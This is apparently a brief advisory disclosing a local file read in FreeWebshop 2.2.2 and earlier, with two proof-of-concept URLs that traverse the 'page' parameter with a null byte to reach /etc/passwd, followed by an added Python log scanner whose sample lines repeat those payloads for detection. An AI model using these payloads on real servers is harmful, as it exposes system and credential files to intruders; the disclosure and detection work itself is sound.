FreeWebshop <=2.2.2



FreeWebshop <=2.2.2
severity: high
vendor site: http://www.freewebshop.org/ 

impact: an anonymous user can access any file on the remote server

PoC :
http://site.com/?page=../../../../../../../../../../etc/passwd%00 
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00 


xss get :

 


laurent gaffié & benjamin mossé
http://s-a-p.ca/ 
contact: saps.audit@gmail.com 
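
A log check for the `page` traversal requests shown in the PoC, added here as an example (not part of the original advisory or FreeWebshop's code). It assumes Combined Log Format access logs; the sample lines, the function names and the double-encoded variant it also normalises are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Combined Log Format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1432 "-" "-"
203.0.113.7 - - [01/Jan/2024:10:01:05 +0000] "GET /?page=..%252f..%252fetc%252fpasswd%2500 HTTP/1.1" 200 1432 "-" "-"
198.51.100.4 - - [01/Jan/2024:10:02:11 +0000] "GET /index.php?page=cart HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [01/Jan/2024:10:03:40 +0000] "GET /index.php?page=details&prod=12 HTTP/1.1" 200 4801 "-" "-"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
DOTDOT_RE = re.compile(r"(^|/)\.\.(/|$)")  # a ".." path segment

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_page_param(target):
    """Return reasons why the `page` query parameter looks like file traversal."""
    reasons = []
    query = urlsplit(target).query
    for raw in parse_qs(query, keep_blank_values=True).get("page", []):
        value = fully_decode(raw).replace("\\", "/")
        if DOTDOT_RE.search(value.replace("\x00", "")) and "traversal" not in reasons:
            reasons.append("traversal")
        if "\x00" in value and "null-byte" not in reasons:
            reasons.append("null-byte")
    return reasons

def scan(log_text):
    """Return (client, status, target, reasons) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        reasons = classify_page_param(target)
        if reasons:
            hits.append((client, int(status), target, reasons))
    return hits

if __name__ == "__main__":
    for client, status, target, reasons in scan(SAMPLE_LOG):
        print(client, status, ",".join(reasons), target)
```

A hit with a 200 status and a response size that differs from the normal page is worth triaging first.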
